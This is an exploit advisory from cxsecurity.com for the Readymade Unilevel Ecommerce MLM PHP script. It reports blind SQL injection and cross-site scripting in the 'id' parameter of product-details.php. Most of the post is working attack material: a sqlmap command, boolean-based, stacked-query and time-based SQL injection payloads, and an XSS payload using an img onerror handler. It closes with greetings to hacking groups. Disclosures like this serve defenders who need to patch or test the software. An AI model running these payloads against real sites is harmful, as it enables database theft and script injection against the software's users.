ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

2024.08.03
Credit: OoN_Boy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

[x]========================================================================================================================================[x] | Title : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities | Software : Readymade Unilevel Ecommerce | Last Update : 15/03/24 [TESTED VERSION SCRIPT] | First Release: 16/11/21 | Vendor : http://www.i-netsolution.com/ | Date : 01 Agustus 2024 | Author : OoN_Boy [x]========================================================================================================================================[x] | Technology : PHP | Database : MySQL | Price : $500 | Description : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business. [x]========================================================================================================================================[x] [O] Exploit http://localhost/eommlm/product-details.php?id=11[SQL] http://localhost/ecomlm/product-details.php?id=11[XSS] [O] Proof of concept sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string [SQL] Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=11 AND 1189=1189 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: id=11;SELECT SLEEP(10)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL) [XSS] http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY> [x]========================================================================================================================================[x] [O] Greetz BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^ [x]========================================================================================================================================[x]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top